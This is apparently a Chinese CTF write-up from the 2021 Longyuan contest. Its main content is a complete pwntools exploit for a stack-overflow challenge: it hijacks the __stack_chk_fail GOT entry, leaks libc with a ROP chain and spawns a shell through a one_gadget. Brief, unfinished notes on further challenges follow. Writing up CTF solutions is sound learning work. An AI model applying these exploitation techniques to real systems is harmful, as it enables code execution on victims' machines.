bbbaby
控制__stack_chk_fail,栈溢出
from pwn import *
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'
p = process('./pwn1')#, env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn1')
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
def debug():
gdb.attach(p)
pause()
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
chk_fail = elf.got['__stack_chk_fail']
rdi = 0x0000000000400a03
pl = 'a'*0x118 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(0x000000000040086C) + p64(0x00000000004008BB)
p.sendlineafter('choice\n','0')
p.sendlineafter('address:\n',str(chk_fail))
p.sendafter('content:\n',p64(puts_plt))
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x1000))
p.sendafter('content:\n',pl)
p.sendlineafter('choice\n','2')
libcbase = uu64(r(6)) - libc.sym['puts']
ogg = libcbase + 0x4f322
pl = 'a'*0x118 + p64(ogg)
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x1000))
p.sendafter('content:\n',pl)
p.sendlineafter('choice\n','2')
itr()
Magic
打开一看
熟悉,像是控制流平坦化,不是,就是控制流平坦化混淆。
清楚llvm的混淆原理,那就慢慢分析叭
很简单就一个emmm uaf就完了主要难在分析上。
由于没有2.23的环境就不打了emmm
h3apclass
ren
标签:bpc,陇原战,add,2021,str,PWN,delete,data,lambda From: https://www.cnblogs.com/bpcat/p/16920412.html